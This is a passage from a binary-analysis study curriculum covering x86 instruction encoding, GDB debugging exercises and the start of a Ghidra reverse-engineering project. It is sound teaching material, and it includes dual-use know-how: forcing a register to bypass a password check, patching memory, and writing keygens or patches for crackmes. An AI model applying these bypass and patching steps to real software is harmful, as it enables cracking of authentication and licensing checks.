    • Some opcodes (like 0xF7) use ModR/M Reg field to select the actual instruction. 0xF7 /0 = TEST, /4 = MUL, /6 = DIV. Saves opcode space.
  8. “How does x86 differ from ARM for disassembly?”
    • ARM has fixed 32-bit (or 16-bit Thumb) instructions—disassembly is trivial (every 4 bytes is an instruction). x86 is variable-length (1-15 bytes) with prefix hell—disassembly is complex.
  9. “What’s the challenge with self-modifying code?”
    • Code that changes its own bytes at runtime. Your static disassembly is wrong after modification. Requires dynamic disassembly (disassemble from memory, not file).
  10. “Why would a malware author use opaque predicates or junk bytes?”
    • To break linear disassemblers. Insert jmp label; [garbage bytes]; label:. Linear disassemblers try to decode garbage. Recursive descent skips it.

### Books That Will Help

| Topic | Book | Chapter/Section |
|-------|------|-----------------|
| x86 Instruction Format | Intel 64/IA-32 Software Developer’s Manual | Vol. 2A Ch. 2: Instruction Format |
| Instruction Encoding | “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron | Ch. 3.5: Arithmetic and Logical Operations (encoding examples) |
| Disassembly Algorithms | “Practical Binary Analysis” by Dennis Andriesse | Ch. 6.2: Static Disassembly (Linear vs Recursive Descent) |
| x86-64 Architecture | “Low-Level Programming” by Igor Zhirkov | Ch. 3: Assembly Language, Ch. 8: x86-64 |
| ModR/M and SIB Bytes | Intel SDM Volume 2A | Section 2.1.3-2.1.5: ModR/M, SIB, and Displacement |
| REX Prefix | Intel SDM Volume 2A | Section 2.2.1: REX Prefixes |
| Opcode Map | Intel SDM Volume 2 | Appendix A: Opcode Map |
| Addressing Modes | “Computer Systems: A Programmer’s Perspective” | Ch. 3.5.1: Operand Specifiers |
| Assembly Syntax | “Low-Level Programming” | Ch. 3.2: Assembly Language Syntax |
| Disassembly Tools | “Practical Binary Analysis” | Ch. 5: Basic Binary Analysis in Linux |
| Instruction Reference | Intel SDM Volume 2B-2D | Instruction Set Reference (A-Z) |
| Anti-Disassembly | “Practical Malware Analysis” by Sikorski & Honig | Ch. 15: Anti-Disassembly |
| Obfuscation Techniques | “Practical Binary Analysis” | Ch. 6.2.5: Code Obfuscation |
| Building Disassemblers | “Engineering a Compiler” by Cooper & Torczon | Ch. 4: Intermediate Representations (related concepts) |

### ASCII Diagram: x86-64 Instruction Structure

Maximum instruction length: 15 bytes

```text
+----------+-----+-----+--------+-------+-----+--------------+-----------+
| Prefixes | REX | Opc | ModR/M |  SIB  | Dsp |  Immediate   |  Total    |
+----------+-----+-----+--------+-------+-----+--------------+-----------+
| 0-4 bytes| 0-1 | 1-3 |  0-1   |  0-1  | 0-4 |    0-8       | 1-15 bytes|
+----------+-----+-----+--------+-------+-----+--------------+-----------+
| Optional | Opt | Req | Opt    | Opt   | Opt |   Optional   |           |
+----------+-----+-----+--------+-------+-----+--------------+-----------+

Prefixes (0-4 bytes):
  - Lock and Repeat: F0, F2, F3
  - Segment Override: 2E, 36, 3E, 26, 64, 65
  - Operand-size Override: 66
  - Address-size Override: 67

REX Prefix (x64 only, 0-1 byte):
  0100WRXB
    W = 1: 64-bit operand size
    R = extends ModR/M Reg field
    X = extends SIB Index field
    B = extends ModR/M R/M or SIB Base field

Opcode (1-3 bytes):
  - 1-byte: Most common (add, mov, push, pop, etc.)
  - 2-byte: 0x0F escape code + opcode (syscall, movss, etc.)
  - 3-byte: 0x0F 0x38/0x3A + opcode (SSSE3, SSE4)

ModR/M (0-1 byte): Present for most instructions
  +----+----+----+
  |Mod |Reg |R/M |  (2 bits | 3 bits | 3 bits)
  +----+----+----+
  Mod: Addressing mode
    00 = [R/M]
    01 = [R/M + disp8]
    10 = [R/M + disp32]
    11 = R/M (register direct)
  Reg: Register operand or opcode extension
  R/M: Register or memory operand

SIB (0-1 byte): Present when ModR/M R/M = 100 and Mod ≠ 11
  +-----+-----+------+
  |Scale|Index| Base |  (2 bits | 3 bits | 3 bits)
  +-----+-----+------+
  Encodes: [Base + Index*Scale + Displacement]
  Scale: 1, 2, 4, or 8

Displacement (0-4 bytes):
  - 0 bytes: None
  - 1 byte: disp8 (signed -128 to +127)
  - 4 bytes: disp32 (signed)

Immediate (0-8 bytes):
  - 1, 2, 4, or 8 bytes depending on instruction
  - Constants in mov, add, sub, cmp, etc.
```

Example Instruction Breakdown: `mov rax, [rbp+rcx*8-0x40]`

```text
Bytes: 48 8B 44 CD C0

48        = REX.W (64-bit operands)
8B        = Opcode (MOV r64, r/m64)
44        = ModR/M (Mod=01, Reg=000 (RAX), R/M=100 (needs SIB))
CD        = SIB (Scale=11 (8), Index=001 (RCX), Base=101 (RBP))
C0        = Displacement (-0x40 as signed byte)

Decoding:
  - REX.W → 64-bit operation
  - Opcode 0x8B → MOV destination, source (r, r/m)
  - ModR/M: Mod=01 (disp8), Reg=000 (RAX), R/M=100 (SIB follows)
  - SIB: Scale=11 (×8), Index=001 (RCX), Base=101 (RBP)
  - Displacement: 0xC0 = -64 decimal

Result: mov rax, [rbp + rcx*8 - 0x40]
```
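
The breakdown above can be checked mechanically. A sketch that decodes just this one form (Mod=01, SIB present, disp8), not a general decoder:

```python
# Sketch: decode [base + index*scale + disp8] from the example bytes
# 48 8B 44 CD C0 (mov rax, [rbp + rcx*8 - 0x40]).
REGS = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]

code = bytes([0x48, 0x8B, 0x44, 0xCD, 0xC0])
rex, opcode, modrm, sib, disp = code
assert rex == 0x48 and opcode == 0x8B        # REX.W + MOV r64, r/m64

mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
assert mod == 0b01 and rm == 0b100           # disp8 follows, SIB present

scale = 1 << (sib >> 6)                      # 2-bit scale encodes 1/2/4/8
index, base = (sib >> 3) & 7, sib & 7
d = disp - 256 if disp >= 128 else disp      # sign-extend the disp8

print(f"mov {REGS[reg]}, [{REGS[base]} + {REGS[index]}*{scale} + ({d:#x})]")
# mov rax, [rbp + rcx*8 + (-0x40)]
```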

**Key Insight**: Disassembly is deterministic at each byte but context-dependent across the stream. Starting from the wrong offset produces garbage. This is why malware uses “desynchronization” attacks—embedding unreachable bytes that look like valid instructions to confuse linear disassemblers.

## Project 4: GDB Debugging Deep Dive

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C (for targets), GDB commands
  • Alternative Programming Languages: Python (GDB scripting)
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Debugging / Dynamic Analysis
  • Software or Tool: GDB, pwndbg/GEF, GCC
  • Main Book: “The Art of Debugging with GDB” by Matloff & Salzman

**What you’ll build**: A series of increasingly complex debugging exercises, culminating in a GDB Python extension for automated analysis.

**Why it teaches binary analysis**: Debugging is the most direct way to understand program behavior. GDB is the most powerful open-source debugger.

**Core challenges you’ll face**:

  • Setting breakpoints → maps to controlling execution
  • Examining memory → maps to understanding data layout
  • Stepping through code → maps to following control flow
  • Scripting with Python → maps to automating analysis

Resources for key challenges:

Key Concepts:

  • Breakpoints and Watchpoints: GDB documentation
  • Memory Examination: “The Art of Debugging” Ch. 3
  • Python GDB API: GDB Python documentation

Difficulty: Intermediate. Time estimate: 1-2 weeks. Prerequisites: Basic C, assembly basics

Real world outcome:

Deliverables:

  • Analysis output or tooling scripts
  • Report with control/data flow notes

Validation checklist:

  • Parses sample binaries correctly
  • Findings are reproducible in debugger
  • No unsafe execution outside lab
    $ gdb ./target_binary
    (gdb) break main
    (gdb) run
    (gdb) disassemble
    (gdb) info registers
    (gdb) x/20x $rsp           # Examine stack
    (gdb) x/s 0x402000         # Examine string
    (gdb) set $rax = 0x1337    # Modify register
    (gdb) python
    >gdb.execute("info registers")
    >frame = gdb.selected_frame()
    >print(frame.read_register("rip"))
    >end
    (gdb) continue
    

Implementation Hints:

Essential GDB commands to master:

# Execution control
run [args]           # Start program
continue (c)         # Continue execution
stepi (si)           # Step one instruction
nexti (ni)           # Step over calls
finish               # Run until function returns

# Breakpoints
break *0x401000      # Break at address
break main           # Break at function
watch *(int *)0x7ffd1234  # Break on memory write
catch syscall write  # Break on syscall

# Examination
disassemble main     # Show assembly
info registers       # All registers
x/10i $rip           # 10 instructions at RIP
x/20wx $rsp          # 20 words at stack
x/s 0x402000         # String at address
info proc mappings   # Memory layout

# Modification
set $rax = 0         # Change register
set *(int*)0x401000 = 0x90909090  # Patch memory

Create exercises:

  1. Find a hidden password in a crackme
  2. Trace a function’s execution
  3. Modify a return value to bypass a check
  4. Write a GDB script to log all function calls

Learning milestones:

  1. Basic debugging → Set breakpoints, step, examine
  2. Memory analysis → Understand stack and heap layout
  3. Modify execution → Change registers and memory
  4. Python scripting → Automate repetitive tasks

The Core Question You’re Answering

How do you observe and manipulate a running program’s state without modifying its source code, and why is interactive debugging more powerful than static analysis for understanding complex behavior?

Debugging bridges the gap between theory and reality. Static analysis shows what code could do. Dynamic analysis with GDB shows what it actually does—with real data, real timing, and real state.

Concepts You Must Understand First

1. Process Memory Layout and Address Space

When you debug a program, you’re inspecting its virtual memory: code, data, heap, stack, and libraries.

Guiding questions:

  • What’s the difference between the stack and the heap?
  • Why do local variables live at high addresses and code at low addresses?
  • How does GDB access another process’s memory?

Key reading: “Computer Systems: A Programmer’s Perspective” Ch. 9 (Virtual Memory), “Hacking: The Art of Exploitation” Ch. 2 (Programming - Memory Segments)

2. Breakpoints: Software vs. Hardware

Software breakpoints replace instruction bytes with int3 (0xCC on x86). Hardware breakpoints use CPU debug registers.

Guiding questions:

  • How does GDB set a software breakpoint without permanently modifying the binary?
  • What are the limits on hardware breakpoints? (Typically 4 on x86)
  • When would you use a hardware breakpoint instead of software?

Key reading: “The Art of Debugging with GDB, DDD, and Eclipse” Ch. 2 (Breakpoints), Intel SDM Volume 3 Ch. 17 (Debug Registers)
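The software-breakpoint mechanics can be simulated on a plain byte array. A toy sketch (no real ptrace involved; the class and names are invented for illustration):

```python
INT3 = 0xCC  # x86 one-byte trap instruction

class ToyDebugger:
    """Simulates how a debugger plants and removes a software breakpoint."""
    def __init__(self, text_bytes):
        self.mem = bytearray(text_bytes)   # stand-in for the target's .text
        self.saved = {}                    # addr -> original instruction byte

    def set_breakpoint(self, addr):
        self.saved[addr] = self.mem[addr]  # remember the real byte
        self.mem[addr] = INT3              # patch in the trap

    def remove_breakpoint(self, addr):
        self.mem[addr] = self.saved.pop(addr)  # restore the original byte

code = bytes([0x55, 0x48, 0x89, 0xE5])     # push rbp; mov rbp, rsp
dbg = ToyDebugger(code)
dbg.set_breakpoint(0)
assert dbg.mem[0] == INT3                  # trap planted in "memory"
dbg.remove_breakpoint(0)
assert bytes(dbg.mem) == code              # original code fully restored
```

This is why a software breakpoint never "permanently" modifies the binary on disk: only the process's in-memory copy of the code is patched.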

3. The Call Stack and Stack Frames

The stack grows with each function call. Each frame contains local variables, saved registers, and the return address.

Guiding questions:

  • How does GDB’s backtrace command work?
  • What’s stored in the base pointer (RBP) and stack pointer (RSP)?
  • How can you inspect a caller’s variables from a deeper function?

Key reading: “Computer Systems: A Programmer’s Perspective” Ch. 3.7 (Procedures), “Hacking: The Art of Exploitation” Ch. 3 (Exploitation - Stack Overflows)
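You can see how backtrace works by walking the saved-frame-pointer chain in a mock stack. A sketch under the classic rbp-chain convention (real GDB also uses DWARF unwind info; the addresses below are made up):

```python
def backtrace(memory, rbp):
    """Walk saved-RBP links: each frame stores [saved rbp][return address]."""
    frames = []
    while rbp != 0:
        ret_addr = memory[rbp + 8]   # return address sits just above saved rbp
        frames.append(ret_addr)
        rbp = memory[rbp]            # follow the link to the caller's frame
    return frames

# Fake 64-bit stack: three nested calls, chain terminated by a zero rbp.
mem = {
    0x7f00: 0x7f40, 0x7f08: 0x401150,   # innermost frame -> return into caller
    0x7f40: 0x7f80, 0x7f48: 0x401180,   # middle frame    -> return into main
    0x7f80: 0x0000, 0x7f88: 0x4011b0,   # main's frame, chain ends here
}
print([hex(a) for a in backtrace(mem, 0x7f00)])
```

The output lists return addresses from innermost to outermost frame, exactly the order backtrace prints them.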

4. Symbols and Debug Information (DWARF)

Stripped binaries have no function names. Binaries compiled with -g contain DWARF debug info mapping addresses to source lines.

Guiding questions:

  • What’s the difference between a stripped and non-stripped binary?
  • How does GDB find variable names and types?
  • Can you debug a stripped binary? What do you lose?

Key reading: “Practical Binary Analysis” Ch. 5.3 (Symbols and Stripped Binaries), DWARF Debugging Standard documentation

5. Watchpoints: Breaking on Data, Not Code

Watchpoints trigger when memory is read, written, or changes value. Crucial for finding “who modified this variable?”

Guiding questions:

  • How are watchpoints implemented? (Hint: hardware debug registers)
  • What’s the performance cost of watchpoints?
  • Can you watch a range of addresses or only individual locations?

Key reading: “The Art of Debugging with GDB” Ch. 3 (Watchpoints and Catchpoints), GDB Documentation (Watchpoints section)
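A software watchpoint is essentially "single-step, then re-check the watched value after every instruction," which explains its huge performance cost. A toy model (the trace format here is invented for illustration):

```python
def run_with_watchpoint(trace, watched_addr):
    """Single-step a fake write trace; report every change to one address."""
    memory, hits = {}, []
    for pc, addr, value in trace:           # each step writes value to addr
        old = memory.get(addr)
        memory[addr] = value
        if addr == watched_addr and old != value:
            hits.append((pc, old, value))   # "watchpoint hit" after this step
    return hits

trace = [(0x401000, 0x7ffc10, 100),   # secret = 100
         (0x401008, 0x7ffc18, 7),     # unrelated write, no hit
         (0x401010, 0x7ffc10, 120),   # secret += 20
         (0x401018, 0x7ffc10, 240)]   # secret *= 2
print(run_with_watchpoint(trace, 0x7ffc10))
```

Hardware watchpoints avoid this loop entirely: the CPU's debug registers raise the exception, so the program runs at full speed between hits.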

6. GDB’s Python API and Automation

GDB embeds Python for scripting. You can automate tasks, write custom commands, and analyze program state programmatically.

Guiding questions:

  • How do you access registers from Python in GDB?
  • Can you set breakpoints from a Python script?
  • How would you log every function call automatically?

Key reading: GDB Python API documentation, “The Art of Debugging with GDB” Ch. 8 (Scripting)

7. Debugging Multi-Threaded Programs

Threads share memory but have separate stacks and registers. Debugging threads requires understanding concurrency.

Guiding questions:

  • How do you switch between threads in GDB?
  • What happens when one thread hits a breakpoint—do others stop?
  • How do you debug race conditions?

Key reading: “Computer Systems: A Programmer’s Perspective” Ch. 12 (Concurrent Programming), “The Art of Debugging with GDB” Ch. 6 (Debugging Multi-threaded Programs)

8. Remote Debugging and Embedded Systems

GDB can debug programs on remote systems or embedded devices using the GDB Remote Serial Protocol.

Guiding questions:

  • How does gdbserver communicate with GDB?
  • Can you debug a program on a different architecture?
  • What’s the difference between native and remote debugging?

Key reading: GDB Documentation (Remote Debugging), “Embedded Systems Architecture” by Tammy Noergaard (GDB sections)

Questions to Guide Your Design

  1. What exercises will teach you the most? Simple “hello world” debugging is boring. What about reversing a password checker? Analyzing a buffer overflow? Tracing a complex data structure?

  2. How will you structure your learning progression? Start with basic commands, then breakpoints, then memory examination, then modification, then Python scripting?

  3. Will you use GDB plugins (pwndbg, GEF, peda)? These add powerful features for exploit development. When should you learn vanilla GDB vs. enhanced versions?

  4. What real-world scenarios will you practice? Debugging a segfault? Finding a memory leak? Analyzing a crackme? Reverse engineering a proprietary binary?

  5. How will you document your GDB knowledge? Build a cheat sheet? Create a reference of common commands? Write GDB scripts you can reuse?

  6. Will you learn GDB’s TUI mode? The Text User Interface shows code, registers, and assembly simultaneously. It’s powerful but has a learning curve.

  7. What target binaries will you debug? Toy programs you write, existing open-source software, CTF challenges, or malware samples?

  8. How will you practice without source code? Debugging stripped binaries is a critical skill for reverse engineering.

Thinking Exercise

Before writing Python scripts, master these manual exercises:

Exercise 1: Follow a Function Call Chain Compile this with gcc -g:

#include <stdio.h>
int add(int a, int b) { return a + b; }
int calculate(int x) { return add(x, 10); }
int main() {
    int result = calculate(5);
    printf("Result: %d\n", result);
    return 0;
}

In GDB:

  1. Set breakpoint on main
  2. Run and step into calculate (use step, not next)
  3. Step into add
  4. At each frame, use backtrace to see the call stack
  5. Use frame 1 to inspect calculate’s local variables
  6. Use up and down to navigate frames

Exercise 2: Find Where a Variable Changes

#include <stdio.h>
int main() {
    int secret = 100;
    secret += 20;
    secret *= 2;
    secret -= 50;
    printf("Secret: %d\n", secret);
    return 0;
}

Use a watchpoint:

  1. Break at first line of main
  2. Run to breakpoint
  3. watch secret (sets watchpoint on the variable)
  4. continue repeatedly, noting when and where secret changes
  5. Examine the assembly at each trigger point

Exercise 3: Modify Execution Flow Compile a password checker:

#include <string.h>
#include <stdio.h>
int check_password(char *pass) {
    return strcmp(pass, "letmein") == 0;
}
int main() {
    char input[50];
    fgets(input, 50, stdin);
    input[strcspn(input, "\n")] = '\0';  /* fgets keeps the newline; strip it */
    if (check_password(input)) {
        printf("Access granted!\n");
    } else {
        printf("Access denied!\n");
    }
}

In GDB, bypass the check:

  1. Break on the if statement
  2. Examine $rax (return value of check_password)
  3. Use set $rax = 1 to force success
  4. continue and see “Access granted” despite wrong password

Exercise 4: Examine Data Structures

struct person {
    char name[20];
    int age;
    float salary;
};

int main() {
    struct person p = {"Alice", 30, 75000.0};
    return 0;
}

In GDB:

  1. Break after struct initialization
  2. print p (shows entire structure)
  3. print p.name
  4. print &p (shows address)
  5. x/20xb &p (examine raw bytes)
  6. ptype p (shows structure definition)

Exercise 5: Reverse Engineering a Stripped Binary Compile without -g and strip:

gcc -O2 -o mystery mystery.c
strip mystery

Now debug it:

  1. gdb mystery
  2. disassemble main fails (stripped binaries have no symbol table)
  3. info files shows the entry point instead
  4. break *0x... (break at the entry address, since there are no function names)
  5. Step through the assembly, figuring out what the program does

This is real reverse engineering.
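The entry point that info files reports is the e_entry field of the ELF header: an 8-byte little-endian value at offset 0x18 in a 64-bit ELF. A minimal sketch that reads it from a hand-built header (the header is synthetic; only the fields this demo touches are filled in):

```python
import struct

def elf64_entry(header):
    """Return e_entry from a 64-bit little-endian ELF header."""
    assert header[:4] == b"\x7fELF" and header[4] == 2   # magic + ELFCLASS64
    return struct.unpack_from("<Q", header, 0x18)[0]     # e_entry at 0x18

# Hand-built 64-byte header with entry point 0x401000; unused fields zeroed.
hdr = bytearray(64)
hdr[:5] = b"\x7fELF\x02"
struct.pack_into("<Q", hdr, 0x18, 0x401000)
print(hex(elf64_entry(bytes(hdr))))
```

Point it at a real binary (`open("mystery", "rb").read(64)`) and the printed address is exactly where `break *0x...` should go.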

The Interview Questions They’ll Ask

  1. “How does GDB implement software breakpoints?”
    • GDB saves the original instruction byte at the breakpoint address, replaces it with int3 (0xCC on x86), and restores it when the breakpoint is removed. When int3 executes, the kernel sends SIGTRAP to the debugger.
  2. “What’s the difference between step and next?”
    • step steps into function calls; next steps over them, treating a call as a single step. Their instruction-level counterparts are stepi (si) and nexti (ni).
  3. “How can you find what caused a segmentation fault?”
    • Run the program in GDB. When it crashes, use backtrace to see the call stack, info registers to see register values, and x/i $rip to see the faulting instruction. Usually that instruction dereferences a register holding 0 or another invalid address (a NULL dereference).
  4. “Explain how watchpoints work.”
    • Watchpoints use hardware debug registers (DR0-DR3 on x86) to trigger exceptions when memory is accessed. Limited to 4 simultaneous watchpoints. Software watchpoints exist but are very slow (single-step execution).
  5. “How do you debug a program that immediately crashes?”
    • Use starti to break at the very first instruction, long before main. Or use catch exec to stop right after the exec, before the program’s startup code runs.
  6. “What’s the purpose of ASLR and how do you handle it in GDB?”
    • Address Space Layout Randomization places code/libraries at random addresses for security. GDB can disable ASLR: set disable-randomization on. Useful for consistent breakpoint addresses.
  7. “How do you debug a running process without restarting it?”
    • Use gdb -p <PID> to attach to a running process. GDB sends SIGSTOP, lets you set breakpoints, then you continue.
  8. “What’s the difference between a core dump and live debugging?”
    • A core dump is a snapshot of memory at crash time. You can debug it with gdb program core, but it’s read-only (no execution). Live debugging lets you run, modify, and restart.
  9. “How would you automatically log every function call?”
    • Write a Python script using GDB’s Python API: place a breakpoint on every function (e.g. rbreak . or a gdb.Breakpoint subclass per symbol) and log the function name in the stop handler before continuing.
  10. “What information is lost when debugging a stripped binary?”
    • Function names, variable names, type information, source line mappings. You only have addresses, raw assembly, and sometimes dynamic symbols (from .dynsym).

Books That Will Help

Topic Book Chapter/Section
GDB Basics “The Art of Debugging with GDB, DDD, and Eclipse” by Matloff & Salzman Ch. 1-3: GDB Fundamentals
Memory Layout “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron Ch. 9: Virtual Memory
Stack and Calling Conventions “Computer Systems: A Programmer’s Perspective” Ch. 3.7: Procedures
Breakpoints Internals “The Art of Debugging with GDB” Ch. 2: Breakpoints
Watchpoints “The Art of Debugging with GDB” Ch. 3: Watchpoints and Catchpoints
GDB Python API “The Art of Debugging with GDB” Ch. 8: Other GDB Topics (Scripting)
Debugging Multi-threaded Programs “The Art of Debugging with GDB” Ch. 6: Debugging Multi-threaded Programs
Symbols and DWARF “Practical Binary Analysis” by Dennis Andriesse Ch. 5.3: Symbols and Stripped Binaries
Dynamic Analysis “Practical Malware Analysis” by Sikorski & Honig Ch. 3: Basic Dynamic Analysis
Reverse Engineering with GDB “Practical Binary Analysis” Ch. 5: Basic Binary Analysis in Linux
Exploitation and GDB “Hacking: The Art of Exploitation” by Jon Erickson Ch. 3: Exploitation (Using GDB)
Stack Smashing “Hacking: The Art of Exploitation” Ch. 3.3: Stack-Based Buffer Overflows
CPU Debug Registers Intel 64/IA-32 SDM Volume 3 Ch. 17: Debug, Branch Profile, TSC, and Quality of Service
Remote Debugging GDB Documentation (official) Remote Debugging section
Core Dumps “The Art of Debugging with GDB” Ch. 4: Core Files

ASCII Diagram: GDB Process Interaction

+----------------------+                               +--------------------+
|   Target Process     |  <--- ptrace() system call    |    GDB Debugger    |
|   (Your Program)     |  <--> memory read/write       |    (Controller)    |
|                      |  <--> register access         |                    |
|                      |  <--- set breakpoints         |                    |
+----------------------+                               +--------------------+
         |                                                      |
         |                                                      |
         v                                                      v
+-------------------+                                            +-----------------+
| Virtual Memory    |                                            | GDB Commands    |
| +---------------+ |                                            | - break         |
| | Stack         | |  <-- GDB can read/write                    | - run           |
| | (local vars)  | |      any of this memory                    | - step/next     |
| +---------------+ |                                            | - print         |
| | Heap          | |                                            | - x (examine)   |
| | (malloc'd)    | |                                            | - set           |
| +---------------+ |                                            | - backtrace     |
| | .data         | |                                            | - disassemble   |
| | (globals)     | |                                            +-----------------+
| +---------------+ |
| | .text         | |
| | (code)        | |  <-- Software breakpoint: int3 (0xCC)
| | ...           | |      Hardware breakpoint: DR0-DR3 registers
| | 0x401000: RET | |
| +---------------+ |
+-------------------+

Breakpoint Mechanism:
  Original: 0x401000: 55        (push rbp)
  GDB sets: 0x401000: CC        (int3 trap instruction)
  When hit: Kernel sends SIGTRAP to GDB
  GDB:      Restores original byte (55)
            Shows user the breakpoint hit
            User can inspect/modify state
  Continue: Executes real instruction (55)
            Re-inserts breakpoint (CC) if persistent

GDB Command Categories

Execution Control:
  run (r)              - Start program
  continue (c)         - Resume execution
  step (s)             - Step into (source line)
  stepi (si)           - Step into (instruction)
  next (n)             - Step over (source line)
  nexti (ni)           - Step over (instruction)
  finish               - Run until function returns
  until <location>     - Run until location

Breakpoints:
  break <where>        - Set breakpoint
    break main
    break *0x401000
    break file.c:42
  watch <expr>         - Break on write
  rwatch <expr>        - Break on read
  awatch <expr>        - Break on access
  catch <event>        - Break on event
    catch syscall write
  info breakpoints     - List all breakpoints
  delete <n>           - Delete breakpoint

Examination:
  print <expr>         - Print value
    print $rax
    print myvar
    print/x $rsp      (hex format)
  x/<n><f><u> <addr>   - Examine memory
    x/10i $rip        (10 instructions)
    x/20xw $rsp       (20 words in hex)
    x/s 0x402000      (string)
  info registers       - Show all registers
  info frame           - Current stack frame
  backtrace (bt)       - Call stack
  disassemble <where>  - Show assembly

Modification:
  set <var> = <value>  - Change variable
    set $rax = 0
    set myvar = 100
    set *(int*)0x401000 = 0x90909090

Process Info:
  info proc mappings   - Memory map
  info sharedlibrary   - Loaded libraries
  info threads         - List threads
  thread <n>           - Switch to thread

Python Scripting:
  python <code>        - Execute Python
  python-interactive   - Python REPL
  source script.py     - Run script

Key Insight: GDB isn’t just for finding bugs—it’s a reverse engineering Swiss Army knife. Combined with scripting, you can automate complex analysis: trace all heap allocations, log every comparison against a password, or build a complete call graph. Master GDB and you unlock the ability to understand any binary.

Project 5: Ghidra Reverse Engineering

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Java (for scripts), Ghidra
  • Alternative Programming Languages: Python (Ghidrathon)
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 2. The “Micro-SaaS / Pro Tool”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Static Analysis / Decompilation
  • Software or Tool: Ghidra (NSA), sample binaries
  • Main Book: “Ghidra Software Reverse Engineering for Beginners”

What you’ll build: Complete reverse engineering of several binaries of increasing complexity, including writing Ghidra scripts for automation.

Why it teaches binary analysis: Ghidra is the industry-standard free tool. Its decompiler produces C-like code from assembly, dramatically speeding up analysis.

Core challenges you’ll face:

  • Navigating Ghidra’s UI → maps to efficient workflow
  • Using the decompiler → maps to understanding control flow
  • Cross-references → maps to finding function usage
  • Writing scripts → maps to automating analysis

Resources for key challenges:

Key Concepts:

  • Code Browser: Ghidra documentation
  • Decompiler Window: “Ghidra RE for Beginners” Ch. 4
  • Ghidra Scripting: Ghidra API documentation

Difficulty: Intermediate. Time estimate: 2-3 weeks. Prerequisites: Projects 1-4, solid assembly knowledge

Real world outcome:

Deliverables:

  • Analysis output or tooling scripts
  • Report with control/data flow notes

Validation checklist:

  • Parses sample binaries correctly
  • Findings are reproducible in debugger
  • No unsafe execution outside lab

Analyzing a CTF crackme in Ghidra:
  1. Load binary → Auto-analysis runs
  2. Find main() → Entry point analysis
  3. Decompile main() → See C-like code:

    int main(int argc, char **argv) {
        char input[32];
        printf("Enter password: ");
        scanf("%s", input);
        if (check_password(input)) {
            printf("Correct!\n");
        } else {
            printf("Wrong!\n");
        }
        return 0;
    }

  4. Analyze check_password() → Find algorithm
  5. Write keygen or patch binary

Implementation Hints:

Ghidra workflow:

  1. Create project → Import binary
  2. Let auto-analysis complete
  3. Navigate with ‘G’ (goto address) or symbol tree
  4. Use ‘L’ to rename functions/variables
  5. Use ‘;’ to add comments
  6. Use ‘X’ to find cross-references

Scripting example (Ghidra Python):

# Find all calls to dangerous functions
# (Ghidra's built-in Jython is Python 2: no f-strings)
dangerous = ["gets", "strcpy", "sprintf"]
for func_name in dangerous:
    func = getFunction(func_name)  # first function with this name, or None
    if func:
        refs = getReferencesTo(func.getEntryPoint())
        for ref in refs:
            print("Call to %s at %s" % (func_name, ref.getFromAddress()))

Learning milestones:

  1. Navigate efficiently → Find functions, strings, imports
  2. Understand decompiler output → Read C-like code
  3. Rename and annotate → Make code understandable
  4. Write scripts → Automate repetitive analysis

The Core Question You’re Answering

How do you transform an opaque binary blob into understandable, analyzable code without access to source, and how can you automate this process at scale?

This project teaches you to bridge the gap between raw machine code and high-level logic using industry-standard tooling. You’ll learn not just to read binaries, but to make them readable for others.

Concepts You Must Understand First

1. Intermediate Representations (IR)

An IR is a translation layer between machine code and high-level code. Ghidra uses “P-Code” as its IR, which normalizes different CPU architectures into a common format.

Guiding Questions:

  • Why can’t decompilers directly translate assembly to C without an intermediate step?
  • How does P-Code handle architecture-specific quirks (endianness, calling conventions)?
  • What information is lost when converting from assembly to IR?

Book Reference: “Practical Binary Analysis” Ch. 6 - Binary Analysis Fundamentals
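To see why an IR helps, here is a toy lowering of two x86 instructions into architecture-neutral operations, loosely modeled on P-Code's COPY/INT_ADD/INT_CARRY ops (the tuple format and parser here are invented for illustration; real P-Code is far richer):

```python
def lift(instr):
    """Lift a tiny subset of x86 text into generic (op, dst, srcs) tuples."""
    mnem, ops = instr.split(" ", 1)
    dst, src = [o.strip() for o in ops.split(",")]
    if mnem == "mov":
        return [("COPY", dst, [src])]
    if mnem == "add":
        # x86 'add' both computes a sum and sets flags;
        # the IR splits that into explicit, separate operations.
        return [("INT_ADD", dst, [dst, src]),
                ("INT_CARRY", "CF", [dst, src])]
    raise ValueError("unhandled: " + mnem)

print(lift("mov rax, rbx"))
print(lift("add rax, 8"))
```

Once every architecture's instructions are lowered this way, the decompiler's later stages (data flow, type inference, C generation) only ever see the common format.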

2. Control Flow Graphs (CFG)

CFGs represent program execution paths as nodes (basic blocks) and edges (jumps/branches). Ghidra automatically builds CFGs to understand program structure.

Guiding Questions:

  • What defines a basic block boundary (entry/exit points)?
  • How do conditional branches create multiple paths in a CFG?
  • Why are CFGs essential for decompilation quality?

Book Reference: “Practical Binary Analysis” Ch. 7 - Simple Code Injection
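The "leaders" algorithm behind basic-block splitting is short enough to sketch. Given addressed instructions and branch targets (a toy encoding invented for this example): the first instruction, every branch target, and every instruction after a branch each start a new block.

```python
def basic_blocks(instrs):
    """Split (addr, mnemonic, target) instructions into basic blocks."""
    addrs = [a for a, _, _ in instrs]
    leaders = {addrs[0]}                        # first instruction leads
    for i, (addr, mnem, target) in enumerate(instrs):
        if mnem in ("jmp", "jz", "jnz", "call", "ret"):
            if target is not None:
                leaders.add(target)             # branch target starts a block
            if i + 1 < len(instrs):
                leaders.add(addrs[i + 1])       # fall-through starts a block
    blocks, current = [], []
    for addr, _, _ in instrs:
        if addr in leaders and current:
            blocks.append(current)
            current = []
        current.append(addr)
    blocks.append(current)
    return blocks

instrs = [(0x00, "cmp", None), (0x02, "jz", 0x08),
          (0x04, "mov", None), (0x06, "jmp", 0x0a),
          (0x08, "mov", None), (0x0a, "ret", None)]
print(basic_blocks(instrs))
```

Ghidra does the same partitioning (plus edge construction) automatically during analysis; the block boundaries are what its graph view draws.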

3. Data Flow Analysis

Understanding how data moves through a program—from parameters through operations to return values—is key to renaming variables meaningfully.

Guiding Questions:

  • How do you track a value from function entry to its use in a comparison?
  • What’s the difference between reaching definitions and use-def chains?
